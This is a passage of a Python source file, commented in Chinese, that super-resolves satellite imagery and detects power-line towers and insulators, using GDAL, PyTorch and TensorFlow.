#u98=np.max(gray)\r\n maxout=255\r\n minout=0\r\n gray_new=minout + ( (gray-d2) / (u98-d2) ) * (maxout - minout)\r\n gray_new[gray_new < minout]=minout\r\n gray_new[gray_new > maxout]=maxout\r\n gray_out=Image.fromarray(gray_new.astype(np.uint8))\r\n return gray_out\r\n\r\n'''清空缓存文件夹'''\r\ndef del_file(filepath):\r\n \"\"\"\r\n 删除某一目录下的所有文件或文件夹\r\n :param filepath: 路径\r\n :return:\r\n \"\"\"\r\n del_list = os.listdir(filepath)\r\n for f in del_list:\r\n file_path = os.path.join(filepath, f)\r\n if os.path.isfile(file_path):\r\n os.remove(file_path)\r\n elif os.path.isdir(file_path):\r\n shutil.rmtree(file_path)\r\n\r\n'''进度条函数'''\r\n# def process_bar(percent, start_str='', end_str='', total_length=0):\r\n# bar = ''.join([\"\\033[31m%s\\033[0m\"%' '] * int(percent * total_length)) + ''\r\n# bar = '\\r' + start_str + bar.ljust(total_length) + ' {:0>4.1f}%|'.format(percent*100) + end_str\r\n# print(bar, end='', flush=True)\r\ndef process_bar(percent, start_str='', end_str='', total_length=0):\r\n a='*'* int(100 * percent)\r\n b='.'* (100 - int(100 * percent))\r\n c=int(100 * percent)\r\n print(\"{:^3.0f}%[{}->{}]\".format(c, a, b))\r\n time.sleep(0.1)\r\n\r\n'''直接超分辨率函数'''\r\ndef SuperResolution(im_data, ModType, SaveForDetect=True, SateType='SV1', use_gpu = True):\r\n '''\r\n 超分辨率函数\r\n '''\r\n ################################################\r\n im_data = im_data.astype(np.float32)/255.\r\n im_data = np.expand_dims(im_data, axis=0)\r\n im_data = torch.tensor(im_data)\r\n ################################################读取tif文件并转为tensor格式\r\n LoadPath = './models/SRmodels/'+SateType+'/'+ModType+'.pth'\r\n model = Model_Builder(LoadPath, ModType, use_gpu)\r\n #print('Model created')\r\n ################################################创建超分辨率模型\r\n m ,n = im_data.shape[2], im_data.shape[3]\r\n m1 = math.ceil(m/600)\r\n n1 = math.ceil(n/600)\r\n b = torch.zeros(1,4,m1*600,n1*600)\r\n b[:,:,0:m,0:n]=im_data\r\n del im_data\r\n b_SR = np.zeros((4,m1*2400,n1*2400), dtype=np.uint8)\r\n count=100000\r\n for i in range(0, m1):\r\n for j in range (0, n1):\r\n #影像超分辨率\r\n count=count+1\r\n if torch.sum(b[:,:,i*600:i*600+600,j*600:j*600+600],(1,2,3))>0:\r\n model.feed_data(b[:,:,i*600:i*600+600,j*600:j*600+600])\r\n model.test()\r\n visuals = model.get_current_visuals(need_HR=False)\r\n sr_img = tensor2rsimg(visuals['SR'])\r\n b_SR[:,i*2400:i*2400+2400,j*2400:j*2400+2400]=sr_img\r\n del b\r\n if SaveForDetect:\r\n # 判断是否采用伪彩色融合\r\n b_SR1=np.zeros((3,m*4,n*4), dtype=np.uint8)\r\n # b_SR1[0,:,:]=b_SR[2,:m*4,:n*4]\r\n # b_SR1[1,:,:]=b_SR[3,:m*4,:n*4]\r\n # b_SR1[2,:,:]=b_SR[0,:m*4,:n*4]\r\n #\r\n b_SR1[0,:,:]=b_SR[2,:m*4,:n*4]\r\n b_SR1[1,:,:]=b_SR[3,:m*4,:n*4]\r\n b_SR1[2,:,:]=b_SR[0,:m*4,:n*4]\r\n else:\r\n b_SR1=np.zeros((4,m*4,n*4), dtype=np.uint8)\r\n b_SR1[0,:,:]=b_SR[0,:m*4,:n*4]\r\n b_SR1[1,:,:]=b_SR[1,:m*4,:n*4]\r\n b_SR1[2,:,:]=b_SR[2,:m*4,:n*4]\r\n b_SR1[3,:,:]=b_SR[3,:m*4,:n*4]\r\n del b_SR\r\n return b_SR1\r\n\r\n'''超分辨率总体函数'''\r\ndef DoSR(InPath, ModType, OutPath, Stretch, SaveForDetect, SateType, DoWhole, use_gpu):\r\n im_proj, im_geotrans, data = read_img(InPath)\r\n step = 0\r\n end_str = '100%'\r\n # 判断是否需要灰度拉伸,若是则执行\r\n if Stretch=='True':\r\n print(\"灰度拉伸中\")\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n data[0, :, :] = imgstretch(data[0, :, :])\r\n step = step + 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n data[1, :, :] = imgstretch(data[1, :, :])\r\n step = step + 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n data[2, :, :] = imgstretch(data[2, :, :])\r\n step = step + 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n data[3, :, :] = imgstretch(data[3, :, :])\r\n step = step + 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n print(\"灰度拉伸完成\")\r\n step = 0\r\n # 执行超分辨率部分\r\n if DoWhole=='True':\r\n # 首先判断是否针对整景影像进行超分,若是则执行过程如下\r\n m, n = data.shape[1], data.shape[2]\r\n m1 = math.ceil(m / 1200)\r\n n1 = math.ceil(n / 1200)\r\n b = np.zeros((4, 1200 * m1, 1200 * n1), dtype=np.uint8)\r\n b[:, 0:m, 0:n] = data\r\n del data\r\n # 影像边长补齐为1200的整数倍\r\n count = 100000\r\n if SaveForDetect=='True':\r\n # 判断是否使用假彩色\r\n print(\"影像超分辨率缓存中\")\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n b_SR = np.zeros((3, 4800, 4800), dtype=np.uint8)\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n # 执行超分辨率并缓存\r\n b_SR = SuperResolution(b[:, i * 1200:i * 1200 + 1200, j * 1200:j * 1200 + 1200],\r\n ModType, SaveForDetect, SateType, use_gpu)\r\n geotrans = np.array(im_geotrans)\r\n xoffset2 = j * 1200\r\n yoffset2 = i * 1200\r\n px = geotrans[0] + xoffset2 * geotrans[1] + yoffset2 * geotrans[2]\r\n py = geotrans[3] + xoffset2 * geotrans[4] + yoffset2 * geotrans[5]\r\n geotrans[0] = px\r\n geotrans[3] = py\r\n geotrans[1] /= 4\r\n geotrans[5] /= 4\r\n if geotrans[5] > 0:\r\n geotrans[5] = -geotrans[5]\r\n geotrans = geotrans.tolist()\r\n i1 = count + i\r\n j1 = count + j\r\n progress += 1\r\n write_img('./cache/' + str(i1) + str(j1) + '.tif', im_proj, geotrans, b_SR)\r\n step = 100*progress/(m1*n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n del b\r\n del b_SR\r\n print(\"缓存完成\")\r\n # 超分辨率结果拼接\r\n step = 0\r\n print(\"超分辨率结果拼接中\")\r\n output = np.zeros((3, 4 * m, 4 * n), dtype=np.uint8)\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n if i == m1 - 1:\r\n mi = 4 * m\r\n else:\r\n mi = i * 4800 + 4800\r\n if j == n1 - 1:\r\n nj = 4 * n\r\n else:\r\n nj = j * 4800 + 4800\r\n im_proj2, im_geotrans2, im_data = read_img(\r\n './cache/' + str(count + i) + str(count + j) + '.tif')\r\n output[:, i * 4800:mi, j * 4800:nj] = im_data[:, :mi - i * 4800, :nj - j * 4800]\r\n progress += 1\r\n step = 100 * progress / (m1 * n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n # 超分辨率结果存储\r\n print(\"拼接完成\")\r\n step = 0\r\n print(\"超分辨率影像存储中\")\r\n geotrans2 = np.array(im_geotrans)\r\n geotrans2[1] /= 4\r\n geotrans2[5] /= 4\r\n if geotrans2[5] > 0:\r\n geotrans2[5] = -geotrans2[5]\r\n write_img(OutPath, im_proj, geotrans2.tolist(), output)\r\n del output\r\n print(\"存储完成\")\r\n else:\r\n # 不采用假彩色合成的超分辨率过程\r\n print(\"影像超分辨率缓存中\")\r\n b_SR = np.zeros((4, 4800, 4800), dtype=np.uint8)\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n b_SR = SuperResolution(b[:, i * 1200:i * 1200 + 1200, j * 1200:j * 1200 + 1200],\r\n ModType, SaveForDetect, SateType, use_gpu)\r\n geotrans = np.array(im_geotrans)\r\n xoffset2 = j * 1200\r\n yoffset2 = i * 1200\r\n px = geotrans[0] + xoffset2 * geotrans[1] + yoffset2 * geotrans[2]\r\n py = geotrans[3] + xoffset2 * geotrans[4] + yoffset2 * geotrans[5]\r\n geotrans[0] = px\r\n geotrans[3] = py\r\n geotrans[1] /= 4\r\n geotrans[5] /= 4\r\n if geotrans[5] > 0:\r\n geotrans[5] = -geotrans[5]\r\n geotrans = geotrans.tolist()\r\n i1 = count + i\r\n j1 = count + j\r\n write_img('./cache/' + str(i1) + str(j1) + '.tif', im_proj, geotrans, b_SR)\r\n progress += 1\r\n step = 100 * progress / (m1 * n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n del b\r\n del b_SR\r\n print(\"缓存完成\")\r\n step = 0\r\n print(\"超分辨率结果拼接中\")\r\n output = np.zeros((4, 4 * m, 4 * n), dtype=np.uint8)\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n if i == m1 - 1:\r\n mi = 4 * m\r\n else:\r\n mi = i * 4800 + 4800\r\n if j == n1 - 1:\r\n nj = 4 * n\r\n else:\r\n nj = j * 4800 + 4800\r\n im_proj2, im_geotrans2, im_data = read_img(\r\n './cache/' + str(count + i) + str(count + j) + '.tif')\r\n output[:, i * 4800:mi, j * 4800:nj] = im_data[:, :mi - i * 4800, :nj - j * 4800]\r\n progress += 1\r\n step = 100 * progress / (m1 * n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n print(\"拼接完成\")\r\n print(\"超分辨率影像存储中\")\r\n geotrans2 = np.array(im_geotrans)\r\n geotrans2[1] /= 4\r\n geotrans2[5] /= 4\r\n if geotrans2[5] > 0:\r\n geotrans2[5] = -geotrans2[5]\r\n write_img(OutPath, im_proj, geotrans2.tolist(), output)\r\n del output\r\n print(\"存储完成\")\r\n del_file('./cache/')\r\n else:\r\n # 针对裁剪后影像的超分辨率过程(省略缓存步骤)\r\n print(\"影像超分辨率中\")\r\n data = data.astype(np.float32) / 255.\r\n data = np.expand_dims(data, axis=0)\r\n data = torch.tensor(data)\r\n ####################################################图片转为tensor格式\r\n LoadPath = './models/SRmodels/' + SateType + '/' + ModType + '.pth'\r\n model = Model_Builder(LoadPath, ModType, use_gpu)\r\n ####################################################创建超分辨率模型\r\n m, n = data.shape[2], data.shape[3]\r\n m1 = math.ceil(m / 600)\r\n n1 = math.ceil(n / 600)\r\n b = torch.zeros(1, 4, m1 * 600, n1 * 600)\r\n b[:, :, 0:m, 0:n] = data\r\n del data\r\n b_SR = np.zeros((4, m1 * 2400, n1 * 2400), dtype=np.uint8)\r\n count = 100000\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n count = count + 1\r\n if torch.sum(b[:, :, i * 600:i * 600 + 600, j * 600:j * 600 + 600], (1, 2, 3)) > 0:\r\n model.feed_data(b[:, :, i * 600:i * 600 + 600, j * 600:j * 600 + 600])\r\n model.test()\r\n visuals = model.get_current_visuals(need_HR=False)\r\n sr_img = tensor2rsimg(visuals['SR'])\r\n b_SR[:, i * 2400:i * 2400 + 2400, j * 2400:j * 2400 + 2400] = sr_img\r\n progress += 1\r\n step = 100 * progress / (m1 * n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n del b\r\n #####################################################影像超分辨率\r\n print(\"超分辨率完成\")\r\n step = 0\r\n print(\"影像拼接中\")\r\n if SaveForDetect=='True':\r\n b_SR1 = np.zeros((3, m * 4, n * 4), dtype=np.uint8)\r\n b_SR1[0, :, :] = b_SR[2, :m * 4, :n * 4]\r\n step += 1\r\n process_bar(step / 3, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[1, :, :] = b_SR[3, :m * 4, :n * 4]\r\n step += 1\r\n process_bar(step / 3, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[2, :, :] = b_SR[0, :m * 4, :n * 4]\r\n step += 1\r\n process_bar(step / 3, start_str='', end_str=end_str, total_length=15)\r\n else:\r\n b_SR1 = np.zeros((4, m * 4, n * 4), dtype=np.uint8)\r\n b_SR1[0, :, :] = b_SR[0, :m * 4, :n * 4]\r\n step += 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[1, :, :] = b_SR[1, :m * 4, :n * 4]\r\n step += 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[2, :, :] = b_SR[2, :m * 4, :n * 4]\r\n step += 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[3, :, :] = b_SR[3, :m * 4, :n * 4]\r\n step += 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n del b_SR\r\n print(\"拼接完成\")\r\n print(\"超分辨率影像存储中\")\r\n geotrans2 = np.array(im_geotrans)\r\n geotrans2[1] /= 4\r\n geotrans2[5] /= 4\r\n if geotrans2[5] > 0:\r\n geotrans2[5] = -geotrans2[5]\r\n write_img(OutPath, im_proj, geotrans2.tolist(), b_SR1)\r\n del b_SR1\r\n print(\"存储完成\")\r\n\r\n'''定义杆塔识别模块'''\r\ndef read_img_dt(filename):\r\n '''读取带坐标的Tif文件'''\r\n dataset = gdal.Open(filename) #打开文件\r\n\r\n im_width = dataset.RasterXSize #栅格矩阵的列数\r\n im_height = dataset.RasterYSize #栅格矩阵的行数\r\n\r\n im_geotrans = list(dataset.GetGeoTransform()) #仿射矩阵\r\n im_proj = dataset.GetProjection() #地图投影信息\r\n im_data = dataset.ReadAsArray(0,0,im_width,im_height) #将数据写成数组,对应栅格矩阵\r\n\r\n del dataset #清理内存\r\n return im_data\r\n\r\ndef write_img_dt(filename, im_data):\r\n '''保存tif文件'''\r\n if 'int8' in im_data.dtype.name:\r\n datatype = gdal.GDT_Byte\r\n elif 'int16' in im_data.dtype.name:\r\n datatype = gdal.GDT_UInt16\r\n else:\r\n datatype = gdal.GDT_Float32\r\n\r\n #判读数组维数\r\n if len(im_data.shape) == 3:\r\n im_bands, im_height, im_width = im_data.shape\r\n else:\r\n im_bands, (im_height, im_width) = 1,im_data.shape\r\n\r\n #创建文件\r\n driver = gdal.GetDriverByName(\"GTiff\") #数据类型必须有,因为要计算需要多大内存空间\r\n dataset = driver.Create(filename, im_width, im_height, im_bands, datatype)\r\n\r\n #dataset.SetGeoTransform(im_geotrans) #写入仿射变换参数\r\n #dataset.SetProjection(im_proj) #写入投影\r\n\r\n if im_bands == 1:\r\n dataset.GetRasterBand(1).WriteArray(im_data) #写入数组数据\r\n else:\r\n for i in range(im_bands):\r\n dataset.GetRasterBand(i+1).WriteArray(im_data[i])\r\n\r\n del dataset\r\n\r\ndef get_file_names(data_dir, file_type=['tif', 'tiff']):\r\n '''裁剪及合并过程中读取影像文件名'''\r\n result_dir = []\r\n result_name = []\r\n for maindir, subdir, file_name_list in os.walk(data_dir):\r\n for filename in file_name_list:\r\n apath = maindir + '/' + filename\r\n ext = apath.split('.')[-1]\r\n if ext in file_type:\r\n result_dir.append(apath)\r\n result_name.append(filename)\r\n else:\r\n pass\r\n return result_dir, result_name\r\n\r\n\r\ndef get_same_img(img_dir, img_name):\r\n result = {}\r\n for idx, name in enumerate(img_name):\r\n temp_name = ''\r\n for idx2, item in enumerate(name.split('_')[:-4]):\r\n if idx2 == 0:\r\n temp_name = temp_name + item\r\n else:\r\n temp_name = temp_name + '_' + item\r\n\r\n if temp_name in result:\r\n result[temp_name].append(img_dir[idx])\r\n else:\r\n result[temp_name] = []\r\n result[temp_name].append(img_dir[idx])\r\n return result\r\n\r\n\r\ndef assign_spatial_reference_byfile(src_path, dst_path):\r\n '''\r\n 融合坐标信息\r\n :param src_path: 原始整景影像路径\r\n dst_path:需要融合坐标信息的影像路径\r\n :return: None\r\n '''\r\n src_ds = gdal.Open(src_path, gdal.GA_ReadOnly)\r\n sr = osr.SpatialReference()\r\n sr.ImportFromWkt(src_ds.GetProjectionRef())\r\n geoTransform = src_ds.GetGeoTransform()\r\n dst_ds = gdal.Open(dst_path, gdal.GA_Update)\r\n dst_ds.SetProjection(sr.ExportToWkt())\r\n dst_ds.SetGeoTransform(geoTransform)\r\n #print(geoTransform)\r\n dst_ds = None\r\n src_ds = None\r\n\r\ndef assign_spatial_reference_byfile_coordinate(src_path):\r\n '''\r\n 获取坐标信息\r\n :param src_path: 原始整景影像路径\r\n :return: 坐标信息\r\n '''\r\n src_ds = gdal.Open(src_path, gdal.GA_ReadOnly)\r\n sr = osr.SpatialReference()\r\n sr.ImportFromWkt(src_ds.GetProjectionRef())\r\n geoTransform = src_ds.GetGeoTransform()\r\n return geoTransform\r\n\r\n\r\ndef cut(in_dir, out_dir, file_type=['tif', 'tiff'], out_type='tif', out_size=1024):\r\n '''\r\n 裁剪整景影像\r\n :param in_dir: 原始整景影像\r\n out_dir:裁剪后存放的文件夹路径\r\n out_size: 这里默认为1024\r\n :return: None\r\n '''\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n data_dir_list, _ = get_file_names(in_dir, file_type)\r\n count = 0\r\n print('Cut begining for ', str(len(data_dir_list)), ' images.....')\r\n for each_dir in data_dir_list:\r\n time_start = time.time()\r\n # image = np.array(io.imread(each_dir))\r\n #image = np.array(Image.open(each_dir))\r\n image = np.array(read_img_dt(each_dir))\r\n image = np.transpose(image, (1,2,0))\r\n #影像整体分割、分割因素是cut_factor_row x cut_factor_clo\r\n cut_factor_row = int(np.ceil(image.shape[0] / out_size))\r\n cut_factor_clo = int(np.ceil(image.shape[1] / out_size))\r\n for i in range(cut_factor_row):\r\n for j in range(cut_factor_clo):\r\n\r\n if i == cut_factor_row - 1:\r\n i = image.shape[0] / out_size - 1\r\n else:\r\n pass\r\n\r\n if j == cut_factor_clo - 1:\r\n j = image.shape[1] / out_size - 1\r\n else:\r\n pass\r\n\r\n start_x = int(np.rint(i * out_size))\r\n start_y = int(np.rint(j * out_size))\r\n end_x = int(np.rint((i + 1) * out_size))\r\n end_y = int(np.rint((j + 1) * out_size))\r\n\r\n temp_image = image[start_x:end_x, start_y:end_y, :]\r\n\r\n out_dir_images = out_dir + '/' + each_dir.split('/')[-1].split('.')[0] \\\r\n + '_' + str(start_x) + '_' + str(end_x) + '_' + str(start_y) + '_' + str(end_y) + '.' + out_type\r\n #out_dir_images = out_dir + '/' + str(i) + '_' + str(j) + '.' + out_type\r\n #out_dir_images = out_dir + '/' + '_' + str(start_x) + '_' + str(end_x) + '_' + str(start_y) + '_' + str(end_y) + '.' + out_type\r\n\r\n out_image = Image.fromarray(temp_image)\r\n out_image.save(out_dir_images)\r\n\r\n src_path = 'I:/project_insulator/code/FPN_Tensorflow-master/tools/Tif_Cut/6.tif' # 带地理影像\r\n assign_spatial_reference_byfile(args.OutPath, out_dir_images)\r\n\r\n count += 1\r\n print('End of ' + str(count) + '/' + str(len(data_dir_list)) + '...')\r\n time_end = time.time()\r\n print('Time cost: ', time_end - time_start)\r\n print('Cut Finsh!')\r\n return 0\r\n\r\ndef combine(data_dir, w, h, c, out_dir, out_type='tif', file_type=['tif', 'tiff']):\r\n '''\r\n 合并裁剪识别后的影像\r\n :param data_dir: 识别后的裁剪影像\r\n w:整景影像的宽\r\n h:整景影像的高\r\n c: 通道数,默认为3,RGB\r\n out_dir:合并的文件路径\r\n :return: None\r\n '''\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n img_dir, img_name = get_file_names(data_dir, file_type)\r\n print('\\n')\r\n print('Combine begining for ', str(len(img_dir)), ' images.....')\r\n dir_dict = get_same_img(img_dir, img_name)\r\n count = 0\r\n for key in dir_dict.keys():\r\n temp_label = np.zeros(shape=(w, h, c), dtype=np.uint8)\r\n dir_list = dir_dict[key]\r\n for item in dir_list:\r\n name_split = item.split('_')\r\n x_start = int(name_split[-4])\r\n x_end = int(name_split[-3])\r\n y_start = int(name_split[-2])\r\n y_end = int(name_split[-1].split('.')[0])\r\n img = Image.open(item)\r\n img = np.array(img)\r\n temp_label[x_start:x_end, y_start:y_end, :] = img\r\n\r\n img_name = key + '.' + out_type\r\n new_out_dir = out_dir + '/' + img_name\r\n temp_label = np.transpose(temp_label, (2, 0, 1))\r\n write_img_dt(new_out_dir, temp_label)\r\n #由于inference之后影像丧失了坐标信息,这里通过与原始影像进行地理坐标融合\r\n assign_spatial_reference_byfile(args.OutPath, new_out_dir)\r\n count += 1\r\n print('End of ' + str(count) + '/' + str(len(dir_dict)) + '...')\r\n print('Combine Finsh!')\r\n return 0\r\n\r\n#从空间坐标系转换到地理坐标系得到杆塔坐标范围\r\ndef Get_coordinate(geoTransform, box, x_cut, y_cut):\r\n '''\r\n 获得地理坐标\r\n :param geoTransform: GDAL地理数据\r\n box:输出的识别框空间分辨率坐标\r\n x_cut:分割影像的x坐标增加量\r\n y_cut:分割影像的y坐标增加量\r\n :return: 地理坐标\r\n '''\r\n column_left = box[0] + y_cut\r\n row_left = box[1] + x_cut\r\n column_right = box[2] + y_cut\r\n row_right = box[3] + x_cut\r\n Xmap_left = geoTransform[0] + column_left * geoTransform[1] + row_left * geoTransform[2]\r\n Ymap_left = geoTransform[3] + column_left * geoTransform[4] + row_left * geoTransform[5]\r\n Xmap_right = geoTransform[0] + column_right * geoTransform[1] + row_right * geoTransform[2]\r\n Ymap_right = geoTransform[3] + column_right * geoTransform[4] + row_right * geoTransform[5]\r\n return Xmap_left, Ymap_left, Xmap_right, Ymap_right\r\n\r\ndef getSRSPair(dataset):\r\n '''\r\n 获得给定数据的投影参考系和地理参考系\r\n :param dataset: GDAL地理数据\r\n :return: 投影参考系和地理参考系\r\n '''\r\n prosrs = osr.SpatialReference()\r\n prosrs.ImportFromWkt(dataset.GetProjection())\r\n geosrs = prosrs.CloneGeogCS()\r\n return prosrs, geosrs\r\n\r\ndef geo2lonlat(src_path, x_left, y_left, x_right, y_right):\r\n '''\r\n 将投影坐标转为经纬度坐标(具体的投影坐标系由给定数据确定)\r\n :param dataset: GDAL地理数据\r\n :param x: 投影坐标x\r\n :param y: 投影坐标y\r\n :return: 投影坐标(x, y)对应的经纬度坐标(lon, lat)\r\n '''\r\n dataset = gdal.Open(src_path)\r\n prosrs, geosrs = getSRSPair(dataset)\r\n ct = osr.CoordinateTransformation(prosrs, geosrs)\r\n coords_left = ct.TransformPoint(x_left, y_left)\r\n coords_right = ct.TransformPoint(x_right, y_right)\r\n return coords_left[:2], coords_right[:2]\r\n'''定义识别杆塔号模块'''\r\ndef Haversine(lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\r\n\r\n # 将十进制度数转化为弧度\r\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\r\n # haversine公式\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2\r\n # c = 2 * math.asin(math.sqrt(a))\r\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\r\n r = 6371 # 地球平均半径,单位为公里\r\n return c * r * 1000\r\ndef get_tower_label(excel_path, lon, lat):\r\n df = pd.read_excel(excel_path)\r\n dis = df.apply(lambda x: Haversine(x['经度'], x['纬度'], lon, lat), axis=1)\r\n index_get = dis.nsmallest(1).index\r\n return index_get[0], df['杆塔编号'][index_get[0]], df['线路'][index_get[0]]\r\n'''定义绝缘子串识别模块'''\r\ndef reduce_tensor(inp):\r\n \"\"\"\r\n Reduce the loss from all processes so that\r\n process with rank 0 has the averaged results.\r\n \"\"\"\r\n world_size = get_world_size()\r\n if world_size < 2:\r\n return inp\r\n with torch.no_grad():\r\n reduced_inp = inp\r\n dist.reduce(reduced_inp, dst=0)\r\n return reduced_inp\r\n\r\ndef test(config, test_dataset, testloader, model,\r\n sv_dir='output', sv_pred=True):\r\n args = parse_args()\r\n mask_path = []\r\n model.eval()\r\n with torch.no_grad():\r\n for _, batch in enumerate(tqdm(testloader)):\r\n image, size, name = batch\r\n size = size[0]\r\n pred = test_dataset.multi_scale_inference(\r\n model,\r\n image,\r\n scales=config.TEST.SCALE_LIST,\r\n flip=config.TEST.FLIP_TEST)\r\n\r\n if pred.size()[-2] != size[0] or pred.size()[-1] != size[1]:\r\n pred = F.upsample(pred, (size[-2], size[-1]),\r\n mode='bilinear')\r\n\r\n if sv_pred:\r\n name_null = []\r\n name = name[0]\r\n name_null.append(name)\r\n sv_path = sv_dir\r\n if not os.path.exists(sv_path):\r\n os.mkdir(sv_path)\r\n test_dataset.save_pred(pred, sv_path, name_null)\r\n mask_path.append(sv_path + '/' + str(name[0])[2:] + '.png')\r\n del name_null[:]\r\n\r\n\r\ndef insulator_detect():\r\n args = parse_args()\r\n # logger.info(pprint.pformat(args))\r\n # logger.info(pprint.pformat(config))\r\n\r\n # cudnn related setting\r\n # cudnn.benchmark = config.CUDNN.BENCHMARK\r\n # cudnn.deterministic = config.CUDNN.DETERMINISTIC\r\n # cudnn.enabled = config.CUDNN.ENABLED\r\n\r\n # build model\r\n model = get_seg_model(config)\r\n if args.SateType == 'WV':\r\n model_state_file = './models/Insulatormodels/best_WV.pth'\r\n elif args.SateType == 'SV1':\r\n model_state_file = './models/Insulatormodels/best_SV1.pth'\r\n dump_input = torch.rand(\r\n (1, 3, config.TRAIN.IMAGE_SIZE[1], config.TRAIN.IMAGE_SIZE[0])\r\n )\r\n pretrained_dict = torch.load(model_state_file, map_location='cpu')\r\n model_dict = model.state_dict()\r\n pretrained_dict = {k: v for k, v in pretrained_dict.items()\r\n if k in model_dict.keys()}\r\n model_dict.update(pretrained_dict)\r\n model.load_state_dict(model_dict)\r\n\r\n # gpus = list(config.GPUS)\r\n # model = nn.DataParallel(model, device_ids=gpus).cuda()\r\n # model = nn.DataParallel(model, device_ids=gpus)\r\n\r\n # prepare data\r\n test_size = (config.TEST.IMAGE_SIZE[1], config.TEST.IMAGE_SIZE[0])\r\n test_dataset = Cityscapes(\r\n root=config.DATASET.ROOT,\r\n test_img_files='./Tower/',\r\n if_test=True,\r\n num_samples=None,\r\n num_classes=config.DATASET.NUM_CLASSES,\r\n multi_scale=False,\r\n flip=False,\r\n ignore_label=config.TRAIN.IGNORE_LABEL,\r\n base_size=config.TEST.BASE_SIZE,\r\n crop_size= test_size,\r\n downsample_rate=1)\r\n testloader = torch.utils.data.DataLoader(\r\n test_dataset,\r\n batch_size=1,\r\n shuffle=False,\r\n num_workers=config.WORKERS,\r\n pin_memory=True)\r\n # start = timeit.default_timer()\r\n test(config,\r\n test_dataset,\r\n testloader,\r\n model,\r\n sv_dir='./insulator')\r\n\r\n # end = timeit.default_timer()\r\n # logger.info('Mins: %d' % np.int((end - start) / 60))\r\n\r\ndef show_in_img(x, y, final_output_dir, tower_area):\r\n img_mask = cv2.imread(y, 0)\r\n img_mask_array = np.array(img_mask)\r\n img_plt = cv2.imread(x)\r\n contours_cv, hierarchy = cv2.findContours(img_mask_array, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n name_txt = x.split('\\\\')[-1]\r\n name_txt_ture = name_txt.split('.')[0]\r\n for i in range(0, len(contours_cv)):\r\n x_right = np.max(contours_cv[i][:, :, 0]) + int(tower_area[0][0])\r\n x_left = np.min(contours_cv[i][:, :, 0]) + int(tower_area[0][0])\r\n y_right = np.max(contours_cv[i][:, :, 1]) + int(tower_area[0][1])\r\n y_left = np.min(contours_cv[i][:, :, 1]) + int(tower_area[0][1])\r\n area = (x_right - x_left) * (y_right - y_left)\r\n if area < 200:\r\n pass\r\n elif area >4500:\r\n pass\r\n else:\r\n cv2.rectangle(img_plt, (x_left, y_left), (x_right, y_right), (0, 0, 255), 1)\r\n cv2.imwrite(x, img_plt)\r\n\r\ndef show_in_img_multi(x, y, final_output_dir, tower_area):\r\n img_mask = cv2.imread(y, 0)\r\n img_mask_array = np.array(img_mask)\r\n img_plt = cv2.imread(x)\r\n contours_cv, hierarchy = cv2.findContours(img_mask_array, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n name_txt = x.split('\\\\')[-1]\r\n name_txt_ture = name_txt.split('.')[0]\r\n for i in range(0, len(contours_cv)):\r\n x_right = np.max(contours_cv[i][:, :, 0]) + int(tower_area[0])\r\n x_left = np.min(contours_cv[i][:, :, 0]) + int(tower_area[0])\r\n y_right = np.max(contours_cv[i][:, :, 1]) + int(tower_area[1])\r\n y_left = np.min(contours_cv[i][:, :, 1]) + int(tower_area[1])\r\n area = (x_right - x_left) * (y_right - y_left)\r\n if area < 200:\r\n pass\r\n elif area >4500:\r\n pass\r\n else:\r\n cv2.rectangle(img_plt, (x_left, y_left), (x_right, y_right), (0, 0, 255), 1)\r\n cv2.imwrite(x, img_plt)\r\n\r\ndef detect(det_net, inference_save_path, real_test_imgname_list):\r\n '''检测过程'''\r\n # 1. preprocess img\r\n img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not GBR\r\n img_batch = tf.cast(img_plac, tf.float32)\r\n img_batch = short_side_resize_for_inference_data(img_tensor=img_batch,\r\n target_shortside_len=cfgs.IMG_SHORT_SIDE_LEN,\r\n length_limitation=cfgs.IMG_MAX_LENGTH)\r\n img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)\r\n img_batch = tf.expand_dims(img_batch, axis=0)# [1, None, None, 3]\r\n\r\n detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(\r\n input_img_batch=img_batch,\r\n gtboxes_batch=None)\r\n\r\n init_op = tf.group(\r\n tf.global_variables_initializer(),\r\n tf.local_variables_initializer()\r\n )\r\n\r\n restorer, restore_ckpt = det_net.get_restorer()\r\n\r\n config = tf.ConfigProto()\r\n config.gpu_options.allow_growth = True\r\n 